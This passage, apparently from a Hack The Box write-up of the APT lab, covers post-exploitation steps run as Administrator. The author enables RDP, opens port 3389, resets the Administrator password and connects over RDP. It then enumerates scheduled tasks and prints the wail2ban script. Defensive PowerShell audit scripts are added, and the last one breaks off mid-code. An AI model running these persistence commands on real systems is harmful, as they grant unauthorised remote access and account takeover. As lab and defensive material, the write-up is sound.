Beyond
This is the Beyond page, where additional post-exploitation enumeration and assessment are carried out as the highest-privileged (Administrator) user after compromising the target system.
*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.

*Evil-WinRM* PS C:\Users\Administrator\Documents> NET USER Administrator Qwer1234
The command completed successfully.
Enabling RDP (registry value plus firewall opening) and resetting the password of the Administrator user.
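The three changes made above (the fDenyTSConnections registry value, the inbound rule for TCP 3389, and the Administrator password reset) are exactly the kind of post-compromise modifications a defender wants to surface quickly. The following PowerShell is an added example, not part of the original writeup: it audits the current RDP and firewall state and pulls the matching Security events of the last 24 hours. It assumes an elevated session on the Server 2016 host; event 4724 (password reset attempt) needs "Audit User Account Management" and event 4946 (firewall rule added) needs "Audit MPSSVC Rule-Level Policy Change" to be enabled, otherwise those queries simply return nothing.

```powershell
# Added example: audit RDP enablement, 3389 firewall openings and password resets.
# Assumes an elevated PowerShell on the host; event IDs are the standard Windows ones.

# 1. Is RDP allowed? fDenyTSConnections = 0 means Terminal Services accepts connections.
$rdp = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections
if ($rdp.fDenyTSConnections -eq 0) { Write-Warning 'RDP is enabled (fDenyTSConnections = 0)' }

# 2. Which enabled inbound rules open TCP 3389? The legacy "netsh firewall add portopening"
#    call creates a rule named "Remote Desktop" that is not in the built-in rule group,
#    so a rule with an empty Group is the tell-tale sign.
Get-NetFirewallRule -Direction Inbound -Enabled True |
    Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains '3389' } |
    Select-Object DisplayName, Group, Profile, Action

# 3. Password resets (4724) in the last 24 hours: who reset whose password.
$since = (Get-Date).AddHours(-24)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4724; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{ Time = $_.TimeCreated; Target = $d['TargetUserName']; By = $d['SubjectUserName'] }
    }

# 4. Firewall rules added (4946) in the same period; the message names the new rule.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4946; StartTime = $since } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
```

Registry writes to the Terminal Server key can also be audited with event 4657, but that requires a SACL on the key, so the script above relies on the state check instead.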
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:apt.htb.local /cert:ignore /dynamic-resolution /tls-seclevel:0
[22:18:19:511] [2645922:2645923] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:18:19:511] [2645922:2645923] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:18:19:560] [2645922:2645923] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:18:19:561] [2645922:2645923] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:18:19:561] [2645922:2645923] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[22:18:19:238] [2645922:2645923] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
Starting an RDP session
Unfortunately, the target system is a Server Core installation, so there is no desktop to work with.
Exiting the RDP session…
Scheduled Tasks
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
unblock  \        Ready
wail2ban \        Ready
unblock
*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c schtasks /QUERY /TN \unblock /V /FO LIST

Folder: \
HostName:                             APT
TaskName:                             \unblock
Next Run Time:                        10/23/2023 9:30:00 PM
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        10/23/2023 9:15:00 PM
Last Result:                          0
Author:                               N/A
Task To Run:                          Powershell.exe -file C:\scripts\wail2ban\removebans.ps1
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Minute
Start Time:                           12:00:00 AM
Start Date:                           9/24/2020
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        0 Hour(s), 15 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled
The task runs C:\scripts\wail2ban\removebans.ps1 as SYSTEM every 15 minutes.
C:\scripts\wail2ban\removebans.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\scripts\wail2ban\removebans.ps1
cd C:\scripts\wail2ban\
.\wail2ban.ps1 -jail
.\wail2ban.ps1 -jailbreak
C:\scripts\wail2ban\wail2ban.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\scripts\wail2ban\wail2ban.ps1
################################################################################
#                _ _ ____  _
#  __      ____ _(_) |___ \| |__   __ _ _ __
#  \ \ /\ / / _` | | | __) | '_ \ / _` | '_ \
#   \ V  V / (_| | | |/ __/| |_) | (_| | | | |
#    \_/\_/ \__,_|_|_|_____|_.__/ \__,_|_| |_|
#
################################################################################
#
# For help, read the below function.
#
function help {
    "`nwail2ban `n"
    "wail2ban is an attempt to recreate fail2ban for windows, hence [w]indows f[ail2ban]."
    " "
    "wail2ban takes configured events known to be audit failures, or similar, checks for "+`
    "IPs in the event message, and given sufficient failures, bans them for a small amount"+`
    "of time."
    " "
    "settings: "
    "  -config    : show the settings that are being used "
    "  -jail      : show the currently banned IPs"
    "  -jailbreak : bust out all the currently banned IPs"
    "  -help      : This message."
    " "
}

$DebugPreference = "continue"

################################################################################
# Constants

$check_window = 120       # we check the most recent x seconds of log.        default: 120
$check_count = 5          # ban after this many failures in search period.   default: 5
$MAX_BANDURATION = 7776000 # 3 Months in seconds

################################################################################
# Files

$wail2banInstall = ""+(Get-Location)+"\"
$wail2banScript  = $wail2banInstall+"wail2ban.ps1"
$logFile         = $wail2banInstall+"wail2ban_log.log"
$ConfigFile      = $wail2banInstall+"wail2ban_config.ini"
$BannedIPLog     = $wail2banInstall+"bannedIPLog.ini"

################################################################################
# Constructs

$RecordEventLog = "Application"              # Where we store our own event messages
$firewallruleprefix = "wail2ban block:"      # What we name our Rules
$EventTypes = "Application,Security,System"  #Event logs we allow to be processed

new-variable -name regexip -force -value ([regex]'(?:^|(?<=\s))(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))(?=\s|$)')

# Ban Count structure
$BannedIPs = @{}

# Incoming event structure
$CheckEvents = New-object system.data.datatable("CheckEvents")
$null = $CheckEvents.columns.add("EventLog")
$null = $CheckEvents.columns.add("EventID")
$null = $CheckEvents.columns.add("EventDescription")

$WhiteList = @()

#$host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(100,50)

#You can overload the BlockType here for 2003, if you feel like having fun.
$OSVersion = invoke-expression "wmic os get Caption /value"
if ($OSVersion -match "2008") { $BLOCK_TYPE = "NETSH" }
if ($OSVersion -match "2012") { $BLOCK_TYPE = "NETSH" }
if ($OSVersion -match "2016") { $BLOCK_TYPE = "NETSH" }

#Grep configuration file
switch -regex -file $ConfigFile {
    "^\[(.+)\]$" {
        $Header = $matches[1].Trim()
    }
    "^\s*([^#].+?)\s*=\s*(.*)" {
        $Match1 = $matches[1]
        $Match2 = $matches[2]
        if ( $EventTypes -match $Header ) {
            $row = $CheckEvents.NewRow()
            $row.EventLog = $Header
            $row.EventID = $Match1
            $row.EventDescription = $Match2
            $CheckEvents.Rows.Add($row)
        } else {
            switch ($Header) {
                "Whitelist" { $WhiteList += $Match1; }
            }
        }
    }
}

#We also want to whitelist this machine's IPAddress.
$SelfList = (Get-NetIPAddress).IPAddress

################################################################################
# Functions

function event ($text,$task,$result) {
    $event = new-object System.Diagnostics.EventLog($RecordEventLog)
    $event.Source="wail2ban"
    switch ($task) {
        "ADD"    { $logeventID = 1000 }
        "REMOVE" { $logeventID = 2000 }
    }
    switch ($result) {
        "fail"  { $eventtype = [system.diagnostics.eventlogentrytype]::Error; $logeventID += 1 }
        default { $eventtype = [system.diagnostics.eventlogentrytype]::Information}
    }
    $event.WriteEntry($text,$eventType,$logeventID)
}

#Log type functions
function error    ($text) { log "E" $text }
function warning  ($text) { log "W" $text }
function debug    ($text) { log "D" $text }
function actioned ($text) { log "A" $text }

#Log things to file and debug
function log ($type, $text) {
    $output = ""+(get-date -format u).replace("Z","")+" $tag $text"
    if ($type -eq "A") { $output | out-file $logfile -append}
    switch ($type) {
        "D" { write-debug $output}
        "w" { write-warning "warning: $output"}
        "e" { write-error "error: $output"}
        "A" { write-debug $output }
    }
}

#Get the current list of wail2ban bans
function get_jail_list {
    $fw = New-Object -ComObject hnetcfg.fwpolicy2
    return $fw.rules | Where-Object { $_.name -match $FirewallRulePrefix } | Select name, description
}

# Confirm if rule exists.
function rule_exists ($IP) {
    switch($BLOCK_TYPE) {
        "NETSH" { $Rule = "netsh advfirewall firewall show rule name=`"$FirewallRulePrefix $IP`""}
        default { error "Don't have a known Block Type. $BLOCK_TYPE" }
    }
    if ($rule) {
        $result = invoke-expression $rule
        if ($result -match "----------") {
            return "Yes"
        } else {
            return "No"
        }
    }
}

#Convert subnet Slash (e.g. 26, for /26) to netmask (e.g. 255.255.255.192)
function netmask($MaskLength) {
    $ipaddress = [uint32]([convert]::ToUInt32($(("1" * $MaskLength).PadRight(32, "0")), 2))
    $DottedIP = $( For ($i = 3; $i -gt -1; $i--) {
        $remainder = $ipaddress % [math]::Pow(256, $i)
        ($ipaddress - $remainder) / [math]::Pow(256, $i)
        $IPAddress = $Remainder
    } )
    return [string]::Join('.', $DottedIP)
}

#check if IP is whitelisted
function whitelisted($IP) {
    foreach ($white in $Whitelist) {
        if ($IP -eq $white) { $Whitelisted = "Uniquely listed."; break}
        if ($white.contains("/")) {
            $Mask = netmask($white.Split("/")[1])
            $subnet = $white.Split("/")[0]
            if ((([net.ipaddress]$IP).Address -Band ([net.ipaddress]$Mask).Address ) -eq`
                (([net.ipaddress]$subnet).Address -Band ([net.ipaddress]$Mask).Address )) {
                $Whitelisted = "Contained in subnet $white"; break;
            }
        }
    }
    return $Whitelisted
}

#Read in the saved file of settings. Only called on script start, such as after reboot
function pickupBanDuration {
    if (Test-Path $BannedIPLog) {
        get-content $BannedIPLog | %{
            if (!$BannedIPs.ContainsKey($_.split(" ")[0])) { $BannedIPs.Add($_.split(" ")[0],$_.split(" ")[1]) }
        }
        debug "$BannedIPLog ban counts loaded"
    } else { debug "No IPs to collect from BannedIPLog" }
}

#Get the ban time for an IP, in seconds
function getBanDuration ($IP) {
    if ($BannedIPs.ContainsKey($IP)) {
        [int]$Setting = $BannedIPs.Get_Item($IP)
    } else {
        $Setting = 0
        $BannedIPs.Add($IP,$Setting)
    }
    $Setting++
    $BannedIPs.Set_Item($IP,$Setting)
    $banduration = [math]::min([math]::pow(5,$Setting)*60, $MAX_BANDURATION)
    debug "IP $IP has the new setting of $setting, being $BanDuration seconds"
    if (Test-Path $BannedIPLog) { clear-content $BannedIPLog } else { New-Item $BannedIPLog -type file }
    $BannedIPs.keys | %{ "$_ "+$BannedIPs.Get_Item($_) | Out-File $BannedIPLog -Append }
    return $BanDuration
}

# Ban the IP (with checking)
function jail_lockup ($IP, $ExpireDate) {
    $result = whitelisted($IP)
    if ($result) { warning "$IP is whitelisted, except from banning. Why? $result " }
    else {
        if (!$ExpireDate) {
            $BanDuration = getBanDuration($IP)
            $ExpireDate = (Get-Date).AddSeconds($BanDuration)
        }
        if ((rule_exists $IP) -eq "Yes") { warning ("IP $IP already blocked.")
        } else {
            firewall_add $IP $ExpireDate
        }
    }
}

# Unban the IP (with checking)
function jail_release ($IP) {
    if ((rule_exists $IP) -eq "No") { debug "$IP firewall listing doesn't exist. Can't remove it. "
    } else {
        firewall_remove $IP
    }
}

# Add the Firewall Rule
function firewall_add ($IP, $ExpireDate) {
    $Expire = (get-date $ExpireDate -format u).replace("Z","")
    switch($BLOCK_TYPE) {
        "netsh" { $rule = "netsh advfirewall firewall add rule name=`"$firewallruleprefix $ip`" dir=in protocol=any action=block remoteip=$ip description=`"expire: $Expire`"" }
        default { error "Don't have a known Block Type. $BLOCK_TYPE" }
    }
    if ($rule) {
        $result = invoke-expression $rule
        if ($LASTEXITCODE -eq 0) {
            $banmsg = "action successful: Firewall rule added for $IP, expiring on $ExpireDate"
            actioned "$BanMsg"
            event "$BanMsg" ADD OK
        } else {
            $message = "action failure: could not add firewall rule for $IP, error: `"$result`". Return code: $LASTEXITCODE"
            error $Message
            event $Message ADD FAIL
        }
    }
}

# Remove the Firewall Rule
function firewall_remove ($IP) {
    switch($BLOCK_TYPE) {
        "NETSH" { $Rule = "netsh advfirewall firewall delete rule name=`"$FirewallRulePrefix $IP`""}
        default { error "Don't have a known Block Type. $BLOCK_TYPE" }
    }
    if ($rule) {
        $result = invoke-expression $rule
        if ($LASTEXITCODE -eq 0) {
            actioned "action successful: Firewall ban for $IP removed"
            event "Removed IP $IP from firewall rules" REMOVE OK
        } else {
            $message = "action failure: could not remove firewall rule for $IP, error: `"$result`". Return code: $LASTEXITCODE"
            error $Message
            event $Message REMOVE FAIL
        }
    }
}

#Remove any expired bans
function unban_old_records {
    $jail = get_jail_list
    if ($jail) {
        foreach ($inmate in $jail) {
            $IP = $inmate.Name.substring($FirewallRulePrefix.length+1)
            $releasedate = $inmate.description.substring("expire: ".Length)
            if ($([int]([datetime]$ReleaseDate- (Get-Date)).TotalSeconds) -lt 0) {
                debug "unban old records: $IP looks old enough $(get-date $ReleaseDate -format G)"
                jail_release $IP
            }
        }
    }
}

#Convert the TimeGenerated time into Epoch
function WMIDateStringToDateTime( [String] $iSt ) {
    $iSt.Trim() > $null
    $iyear    = [int32]::Parse($iSt.SubString( 0, 4))
    $imonth   = [int32]::Parse($iSt.SubString( 4, 2))
    $iday     = [int32]::Parse($iSt.SubString( 6, 2))
    $ihour    = [int32]::Parse($iSt.SubString( 8, 2))
    $iminute  = [int32]::Parse($iSt.SubString(10, 2))
    $isecond  = [int32]::Parse($iSt.SubString(12, 2))
    $iMilliseconds = 0
    $iutcoffsetminutes = [int32]::Parse($iSt.Substring(21, 4))
    if ( $iutcoffsetminutes -ne 0 ) { $dtkind = [datetimekind]::Local }
    else { $dtkind = [datetimekind]::Utc }
    $ReturnDate = New-Object -TypeName DateTime -ArgumentList $iYear, $iMonth, $iDay, $iHour, $iMinute, $iSecond, $iMilliseconds, $dtkind
    return (get-date $ReturnDate -UFormat "%s")
}

# Remove recorded access attempts, by IP, or expired records if no IP provided.
function clear_attempts ($IP = 0) {
    $Removes = @()
    foreach ($a in $Entry.GetEnumerator()) {
        if ($IP -eq 0) {
            if ([int]$a.Value[1]+$CHECK_WINDOW -lt (get-date ((get-date).ToUniversalTime()) -UFormat "%s").replace(",",".")) { $Removes += $a.Key }
        } else {
            foreach ($a in $Entry.GetEnumerator()) { if ($a.Value[0] -eq $IP) { $Removes += $a.Key } }
        }
    }
    foreach ($b in $Removes) { $Entry.Remove($b)}
}

################################################################################
#Process input parameters
if ($setting) { debug "wail2ban started. $setting" }

#Display current configuration.
if ($args -match "-config") {
    write-host "`nwail2ban is currently configured to: `n ban IPs for " -nonewline
    for ($i = 1; $i -lt 5; $i++) { write-host (""+[math]::pow(5,$i)+", ") -foregroundcolor "cyan" -nonewline }
    write-host "... $($MAX_BANDURATION/60) " -foregroundcolor "cyan" -nonewline
    write-host " minutes, `n if more than " -nonewline
    write-host $CHECK_COUNT -foregroundcolor "cyan" -nonewline
    write-host " failed attempts are found in a " -nonewline
    write-host $CHECK_WINDOW -foregroundcolor "cyan" -nonewline
    write-host " second window. `nThis process will loop every time a new record appears. "
    write-host "`nit's currently checking:"
    foreach ($event in $CheckEvents ) { "- "+$Event.EventLog+" event log for event ID "+$Event.EventDescription+" (Event "+$Event.EventID+")"}
    write-host "`nand we're whitelisting: "
    foreach ($white in $whitelist) {
        write-host "- $($white)" -foregroundcolor "cyan" -nonewline
    }
    write-host "in addition to any IPs present on the network interfaces on the machine"
    exit
}

# Release all current banned IPs
if ($args -match "-jailbreak") {
    actioned "Jailbreak initiated by console. Removing ALL IPs currently banned"
    $EnrichmentCentre = get_jail_list
    if ($EnrichmentCentre){
        "`nAre you trying to escape? [chuckle]"
        "Things have changed since the last time you left the building."
        "What's going on out there will make you wish you were back in here."
        " "
        foreach ($subject in $EnrichmentCentre) {
            $IP = $subject.name.substring($FirewallRulePrefix.length+1)
            firewall_remove $IP
        }
        clear-content $BannedIPLog
    } else { "`nYou can't escape, you know. `n`n(No current firewall listings to remove.)" }
    exit
}

# Show the inmates in the jail.
if ($args -match "-jail") {
    $inmates = get_jail_list
    if ($inmates) {
        "wail2ban currently banned listings: `n"
        foreach ($a in $inmates) {
            $IP = $a.name.substring($FirewallRulePrefix.length+1)
            $expire = $a.description.substring("expire: ".length)
            ""+$IP.PadLeft(14)+" expires at $Expire"
        }
        "`nThis is a listing of the current Windows Firewall with Advanced Security rules, starting with `""+$FirewallRulePrefix+" *`""
    } else { "There are no currrently banned IPs"}
    exit
}

#Unban specific IP. Remove associated schtask, if exists.
if ($args -match "-unban") {
    $ip = $args[ [array]::indexOf($args,"-unban")+1]
    actioned "unban ip invoked: going to unban $IP and remove from the log."
    jail_release $IP
    (get-content $BannedIPLog) | ? {$_ -notmatch $IP } | set-content $BannedIPLog # remove IP from ban log
    exit
}

#Display Help Message
if ($args -match "-help") {
    help; exit
}

################################################################################
#Setup for the loop
$SinkName = "LoginAttempt"
$Entry = @{}
$eventlist ="("
foreach($a in $CheckEvents) {
    $eventlist+="(TargetInstance.EventCode=$($a.EventID) and TargetInstance.LogFile='$($a.EventLog)') OR "
}
$eventlist = $eventlist.substring(0,$eventlist.length-4)+")"
$query = "SELECT * FROM __instanceCreationEvent WHERE TargetInstance ISA 'Win32_NTLogEvent' AND $eventlist"

actioned "wail2ban invoked"
actioned "checking for a heap of events: "
$CheckEvents | %{ actioned " - $($_.EventLog) log event code $($_.EventID)" }
actioned "the whitelist: $whitelist"
actioned "the self-list: $Selflist"

pickupBanDuration

################################################################################
#Loop!
Register-WMIEvent -Query $query -sourceidentifier $SinkName
do { #bedobedo
    $new_event = wait-event -sourceidentifier $SinkName
    $TheEvent = $new_event.SourceeventArgs.NewEvent.TargetInstance
    select-string $RegexIP -input $TheEvent.message -AllMatches | foreach { foreach ($a in $_.matches) {
        $IP = $a.Value
        if ($SelfList -match $IP) { debug "Whitelist of self-listed IPs! Do nothing. ($IP)" }
        else {
            $RecordID = $TheEvent.RecordNumber
            $EventDate = WMIDateStringToDateTime($TheEvent.TIMEGenerated)
            $Entry.Add($RecordID, @($IP,$EventDate))
            $IPCount = 0
            foreach ($a in $Entry.Values) { if ($IP -eq $a[0]) { $IPCount++} }
            debug "$($theevent.logfile) log event captured: ID $($RecordID), IP $IP, Event Code $($TheEvent.EventCode), Attempt #$($IPCount). "
            if ($IPCount -ge $CHECK_COUNT) {
                jail_lockup $IP
                clear_attempts $IP
            }
            clear_attempts
            unban_old_records
        }
    }
    }
    Remove-event -sourceidentifier $SinkName
} while ($true)
It's the wail2ban PowerShell script: a fail2ban port for Windows that subscribes to the configured failed-logon events, extracts the source IP from the event text, and, once an IP has failed $check_count (5) times inside the $check_window (120 seconds), adds a blocking firewall rule named "wail2ban block: <IP>" with an exponentially growing expiry (5^n minutes, capped at 3 months). Note that the "unblock" task above calls removebans.ps1, which runs -jailbreak every 15 minutes, so in practice every ban on this host is lifted within 15 minutes regardless of that expiry.
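To see how the thresholds, the whitelist and the backoff in the script above combine, the following PowerShell is an added example (it is not part of the original writeup or of the wail2ban project): a dry run of the ban decision over a handful of constructed failed-logon messages, without touching the firewall. The functions ConvertTo-UInt32, Test-Whitelisted and Get-BanDuration, the sample messages, the whitelist entries and the IPv4-only regex are this example's own assumptions; the window, count, cap and the 15-minute unblock interval are taken from the page.

```powershell
# Added example: dry run of wail2ban's ban logic over constructed events (no firewall changes).
$CheckWindow  = 120       # seconds of history to look at ($check_window above)
$CheckCount   = 5         # failures before a ban ($check_count above)
$MaxBan       = 7776000   # 3 months in seconds ($MAX_BANDURATION above)
$UnblockEvery = 900       # the "unblock" task runs removebans.ps1 (-jailbreak) every 15 minutes
$Whitelist    = @('10.10.10.0/24', '10.10.16.8')   # constructed whitelist for this example
$BanCounts    = @{}                                # IP -> number of earlier bans, like $BannedIPs

function ConvertTo-UInt32 ([string]$IPv4) {
    # Big-endian integer form of a dotted quad, so a CIDR mask can be applied with -band.
    $b = ([System.Net.IPAddress]$IPv4).GetAddressBytes()
    [Array]::Reverse($b)
    return [BitConverter]::ToUInt32($b, 0)
}

function Test-Whitelisted ([string]$IP) {
    # IPv4 subset of whitelisted(): exact match, or containment in a CIDR entry.
    $ipInt = ConvertTo-UInt32 $IP
    foreach ($entry in $Whitelist) {
        if ($entry -eq $IP) { return "Uniquely listed." }
        if ($entry -notmatch '/') { continue }
        $net, $bits = $entry.Split('/')
        $mask = [uint32]((0xFFFFFFFF -shl (32 - [int]$bits)) -band 0xFFFFFFFF)
        if (($ipInt -band $mask) -eq ((ConvertTo-UInt32 $net) -band $mask)) { return "Contained in subnet $entry" }
    }
    return $null
}

function Get-BanDuration ([string]$IP) {
    # Same growth as getBanDuration(): 5, 25, 125, ... minutes, capped at $MaxBan seconds.
    $n = 1 + [int]$BanCounts[$IP]
    $BanCounts[$IP] = $n
    return [math]::Min([math]::Pow(5, $n) * 60, $MaxBan)
}

# Constructed sample: (seconds, event message) in the wording the Security log uses.
# 10.10.16.8 is whitelisted, 10.10.14.7 fails five times inside 120 s, 10.10.14.9 is too slow.
$Events = @(
    @{ T =   0; Msg = 'An account failed to log on. Source Network Address: 10.10.16.8' },
    @{ T =  10; Msg = 'An account failed to log on. Source Network Address: 10.10.14.7' },
    @{ T =  20; Msg = 'An account failed to log on. Source Network Address: 10.10.14.7' },
    @{ T =  25; Msg = 'An account failed to log on. Source Network Address: 10.10.14.9' },
    @{ T =  30; Msg = 'An account failed to log on. Source Network Address: 10.10.14.7' },
    @{ T =  40; Msg = 'An account failed to log on. Source Network Address: 10.10.14.7' },
    @{ T =  50; Msg = 'An account failed to log on. Source Network Address: 10.10.14.7' },
    @{ T = 200; Msg = 'An account failed to log on. Source Network Address: 10.10.14.9' }
)
$RegexIPv4 = '(?<=^|\s)(?:\d{1,3}\.){3}\d{1,3}(?=\s|$)'   # IPv4-only stand-in for $regexip above

$Attempts = @{}      # RecordID -> @(IP, time), like $Entry in the script
$RecordID = 0
$Report = foreach ($e in $Events) {
    $RecordID++
    foreach ($m in [regex]::Matches($e.Msg, $RegexIPv4)) {
        $ip  = $m.Value
        $why = Test-Whitelisted $ip
        if ($why) { "{0,4}s  {1,-12}  ignored: {2}" -f $e.T, $ip, $why; continue }
        $Attempts[$RecordID] = @($ip, $e.T)
        # Forget attempts older than the window (clear_attempts with no IP).
        foreach ($k in @($Attempts.Keys)) { if ($Attempts[$k][1] + $CheckWindow -lt $e.T) { $Attempts.Remove($k) } }
        $count = @($Attempts.Values | Where-Object { $_[0] -eq $ip }).Count
        if ($count -ge $CheckCount) {
            $nominal = Get-BanDuration $ip
            "{0,4}s  {1,-12}  BAN after {2} failures: nominal {3} min, at most {4} min until the unblock task runs" -f $e.T, $ip, $count, ($nominal / 60), ($UnblockEvery / 60)
            # Drop this IP's attempts (clear_attempts $IP) so a later ban needs fresh failures.
            foreach ($k in @($Attempts.Keys)) { if ($Attempts[$k][0] -eq $ip) { $Attempts.Remove($k) } }
        } else {
            "{0,4}s  {1,-12}  attempt #{2}" -f $e.T, $ip, $count
        }
    }
}
$Report
```

With this input 10.10.14.7 is banned at the fifth failure (50 s) for a nominal 5 minutes, the whitelisted 10.10.16.8 is ignored, and 10.10.14.9 never reaches the threshold because its first attempt has aged out of the 120-second window by the time the second arrives. Real wail2ban also whitelists every address on the host's own interfaces ($SelfList) and matches IPv6; both are left out here to keep the dry run short.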
wail2ban
*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c schtasks /QUERY /TN \wail2ban /V /FO LIST
Folder: \
HostName: APT
TaskName: \wail2ban
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 10/23/2023 12:11:59 PM
Last Result: 0
Author: glasnt
Task To Run: C:\scripts\wail2ban\start_wail2ban.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
At system startup, the task runs C:\scripts\wail2ban\start_wail2ban.bat as SYSTEM.
C:\scripts\wail2ban\start_wail2ban.bat
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\scripts\wail2ban\start_wail2ban.bat
cd c:\scripts\wail2ban\
timeout 120
start powershell .\wail2ban.ps1
C:\scripts\
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\scripts\

    Directory: C:\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020  11:05 AM                wail2ban

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\scripts\wail2ban

    Directory: C:\scripts\wail2ban

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/22/2020  10:15 PM              0 bannedIPLog.ini
-a----       12/16/2017  12:58 PM           1517 LICENCE.md
-a----       12/16/2017  12:58 PM           5530 README.md
-a----        9/24/2020   8:24 AM             72 removebans.ps1
-a----       12/16/2017  12:58 PM           1383 start wail2ban onstartup.xml
-a----       10/22/2020   5:53 PM             71 start_wail2ban.bat
-a----        9/24/2020  11:05 AM          16233 wail2ban.ps1
-a----       12/16/2017  12:58 PM            285 wail2ban_config.ini
-a----       12/16/2017  12:58 PM           2608 wail2ban_htmlgen.ps1
-a----       10/23/2023   9:15 PM          76812 wail2ban_log.log
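Both tasks above run as SYSTEM and execute scripts out of C:\scripts\wail2ban\, so the write permissions on that directory and on the scripts decide who can influence what SYSTEM runs. The following PowerShell is an added example, not part of the original writeup: it lists every non-Microsoft scheduled task, the account it runs as, the file it really executes (for "Powershell.exe -file X" that is X, not powershell.exe), and which principals outside the trusted set can write to that file or its directory. Get-WeakWriters and the trusted-principal list are this example's own assumptions; it needs an elevated session on the host.

```powershell
# Added example: audit non-Microsoft scheduled tasks for script paths writable by
# low-privileged principals. Assumes an elevated PowerShell on the Server 2016 host.
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData'
$trustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')

function Get-WeakWriters {
    # Returns the principals outside $trustedPrincipals that hold write-type Allow ACEs on $Path.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @("<missing: $Path>") }
    (Get-Acl -LiteralPath $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.FileSystemRights -band $writeRights) -ne 0 -and
            $trustedPrincipals -notcontains $_.IdentityReference.Value
        } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' } | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }        # COM-handler actions have no Execute
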